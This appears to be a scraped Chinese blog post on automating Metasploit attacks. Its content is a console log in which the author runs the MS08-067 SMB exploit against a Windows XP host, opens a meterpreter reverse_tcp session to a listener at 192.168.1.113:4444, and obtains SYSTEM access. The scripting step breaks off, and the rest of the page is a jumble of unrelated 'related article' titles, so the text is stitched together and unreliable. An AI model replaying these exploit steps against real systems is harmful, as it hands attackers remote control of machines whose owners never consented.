Metasploit自动化攻击——装X必备

(1)首先进行一次普通渗透

msf6 > search ms08_067Matching Modules
================#  Name                                 Disclosure Date  Rank   Check  Description-  ----                                 ---------------  ----   -----  -----------0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack CorruptionInteract with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi                                                                             msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > optionsModule options (exploit/windows/smb/ms08_067_netapi):Name     Current Setting  Required  Description----     ---------------  --------  -----------RHOSTS                    yes       The target host(s), range CIDR identifier, or hostsfile with syntax 'file:<path>'RPORT    445              yes       The SMB service port (TCP)SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)Payload options (windows/meterpreter/reverse_tcp):Name      Current Setting  Required  Description----      ---------------  --------  -----------EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process,none)LHOST     192.168.1.113    yes       The listen address (an interface may be specified)LPORT     4444             yes       The listen portExploit target:Id  Name--  ----0   Automatic Targetingmsf6 exploit(windows/smb/ms08_067_netapi) > set target 34
target => 34
msf6 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.1.106
rhosts => 192.168.1.106msf6 exploit(windows/smb/ms08_067_netapi) > exploit[*] Started reverse TCP handler on 192.168.1.113:4444
[*] 192.168.1.106:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175174 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.113:4444 -> 192.168.1.106:2648) at 2021-06-04 18:01:33 +0800meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/smb/ms08_067_netapi) > sessions -l -vActive sessions
===============Session ID: 1Name: Type: meterpreter windowsInfo: NT AUTHORITY\SYSTEM @ WINXP-1Tunnel: 192.168.1.113:4444 -> 192.168.1.106:2648 (192.168.1.106)Via: exploit/windows/smb/ms08_067_netapiEncrypted: Yes (AES-256-CBC)UUID: 82804a20859da4c7/x86=1/windows=1/2021-06-04T10:01:31ZCheckIn: 30s ago @ 2021-06-04 18:01:33 +0800Registered: No

(2)写入脚本

┌──(root												

Metasploit自动化攻击——装X必备相关推荐

  1. MetaSploit攻击实例讲解------Metasploit自动化攻击(包括kali linux 2016.2(rolling) 和 BT5)...

    不多说,直接上干货! 前期博客 Kali linux 2016.2(Rolling)里Metasploit连接(包括默认和自定义)的PostgreSQL数据库 Kali linux 2016.2(Ro ...

  2. metasploit 自动化攻击

    第一步开启postgresql数据库 第二步:切入到数据库中 第三步:创建用户名和密码 第四步进入数据库,创建数据库 第五步退出数据库进入msf 注意:1.开启数据库后进行的所有操作都可以保存在数据库 ...

  3. XSS漏洞自动化攻击工具XSSer

    XSS漏洞自动化攻击工具XSSer XSS是Web应用常见的漏洞.利用该漏洞,安全人员在网站注入恶意脚本,控制用户浏览器,并发起其他渗透操作.XSSer是Kali Linux提供的一款自动化XSS攻击 ...

  4. 自动化攻击背景下的过去、现在与未来

    还在用传统的防火墙.IPS还防护网络安全?现在弱爆了,因为攻击已经自动化了!了解更多详细,请查看下面乌云安全峰会神秘嘉宾猪猪侠的主题演讲<自动化攻击背景下的过去.现在与未来>. 以下是猪猪 ...

  5. 《Python黑帽子:黑客与渗透测试编程之道》读书笔记(九):自动化攻击取证

    目录 前言 1.Volatility配置 2.抓取口令的哈希值 3.直接代码注入 4.插入shellcode 结语 前言 <Python黑帽子:黑客与渗透测试编程之道>的读书笔记,会包括书 ...

  6. 用Python创作的搜狗输入法刷字数神器(装逼必备)

    现在很多人都喜欢用搜狗输入法打字,也都清楚它有一个自动统计的字数的功能. 想刷上个几十万字?但手太累?用Python写一小段代码,就可以帮助你快速刷字数,挂机十分钟就可以自动刷30万字.装逼必备! [ ...

  7. 使用Metasploit生成攻击载荷——msfvenom免杀、upx加壳

    文章目录 前言 一.免杀 1.msfvenom的使用 2.多重编码 二.加壳 1.upx的使用 总结 前言 本文详细介绍了使用Metasploit创建攻击载荷(使用攻击载荷生成器msfvenom),以 ...

  8. python调用metasploit自动攻击_Python脚本与Metasploit交互进行自动永恒之蓝攻击-Go语言中文社区...

    我们首先利用 findTarget() 函数找到目标网段或目标主机中开放了445端口的主机,然后利用 confickerExploit() 函数将攻击代码写入 configure.rc 配置文件中,最 ...

  9. 免费录屏、最快截图、装X必备、看完工作学习效率直接翻倍

    大家好,我是辣条. 你知道如何不花钱就能高清无水印录屏吗?你知道怎样才能不规则截图吗?你又知道哪些快捷键能成倍提升电脑操作效率吗?今天我整理了在日常工作.学习.生活中大家都能用得上的超实用window ...

最新文章

  1. IOS长按识别二维码失败
  2. 11g新特性:X$DBGALERTEXT一个很酷的内部视图
  3. 云主机和物理机PK图
  4. Eclipse配置 Maven 异常处理
  5. python textwrap_python2.7.3编译python模块学习- textwrap 文本包装和填充
  6. lua52 C API测试代码
  7. 【转】DB2 常用命令
  8. JAXB –新手的观点,第1部分
  9. C++ — 智能指针的简单实现以及循环引用问题
  10. java学习(154):文件复制
  11. 垃圾回收算法的实现原理_有关垃圾回收算法工作原理的动画指南
  12. Bootstrap3 全局样式
  13. Hibernate知识点总结
  14. 学习C语言中的位操作
  15. solr4.8.1 + tomcat8 配置
  16. Ubuntu 18.04 安装 CUDA
  17. [BZOJ5006][LOJ#2290][THUWC2017]随机二分图(概率+状压DP)
  18. python万年历节气_python3实现万年历(包括公历、农历、节气、节日)
  19. 全球与中国克罗米芬柠檬酸盐市场深度分析及发展趋向分析报告2022-2028年
  20. 华为交换机:利用Excel转换MAC地址公式

热门文章

  1. DS1302数码管显示时--分--秒(按键可修改时间)
  2. 高效时间管理-介绍GTD
  3. 2020(第十六届)北京汽车展览会-以Tesla为参考标的分析
  4. 谷歌PR权重 Google PR与百度权重
  5. CF1548D2 Gregor and the Odd Cows (Hard)
  6. Python 机器学习大作业 用knn算法对adult数据集进行50w年薪收入预测
  7. IBM x3750 M4安装ESXi5.5
  8. 数据库的几种重要作用
  9. 【图像配准】多图配准/不同特征提取算法/匹配器比较测试
  10. 英语发音规则---Q字母